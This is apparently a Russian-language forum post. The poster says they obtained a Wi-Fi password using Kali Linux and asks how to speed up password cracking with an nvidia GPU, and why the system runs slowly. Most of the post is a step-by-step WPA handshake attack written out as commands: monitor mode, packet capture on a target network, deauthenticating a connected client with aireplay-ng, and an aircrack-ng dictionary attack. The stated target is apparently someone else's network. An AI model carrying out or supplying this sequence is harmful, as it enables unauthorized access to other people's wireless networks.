Установил kali linux.
Забрал пароль от wi-fi по инструкции:
Запускаю1. Взлом путем перехвата HandShake:
---узнаем имя нашей карты wifi---
ifconfig wlan
---переводим ее в режим мониторинга---
airmon-ng start wlan0
---сканируем доступные wifi сети (что-бы остановить нажмите ctrl+c)---
airodump-ng mon0
---запускаем сканирование интересующей сети и сохраняем пакеты (ждем рукопожатия)---
airodump-ng mon0 --channel x --bssid xx:xx:xx:xx:xx:xx -w /root/Desktop/WPA
---отключаем клиента от интересующей нас сети что-бы получить handshake---
aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
aircrack-ng -w /(словарь который входит в дистрибутив по умолчанию) -b xx:xx:xx:xx:xx:xx /root/Desktop/WPA*.cap
Примерное время ожидание 12 часов!!! А на второй пароль больше суток.
1. Это нормально что такое время ? Можно ли как то ускорить перебор пароля ?
По официальному мануалу попробовал поставить nvidia драйвер. Слетела вообще вся графическая система и нельзя вернуь как было. Буду переустанавливать kali linux с нуля опять
2. Реально ли ускориться перебор паролей если я установлю nvidia? Во сколько раз ? У меня geforce 810m видюха
3. Установлен с kali linux браузер(icewe....) по умолчанию нереально тормозит. Прокрутка страницы вниз-вверх тормозит. Когда идет отбновление в терминале - торзмозит браузер и вся система. Работает как то отвратительно все после виндовс, в котором все летает. Запускается только с acpi=off. При выключении или перезагрузке виснет и нужно кнопкой вырубать. Почему все так плохо(по сравнению с виндой)? Или нужно ставить дополнительные драйвера и тогда все будет нормально? Если установить фаерфокс(оперу) то они не будут так глючить ? (спрашиваю у опытных,т.к. сам не в теме)
спасибо всем кто ответит на эти 3 вопроса.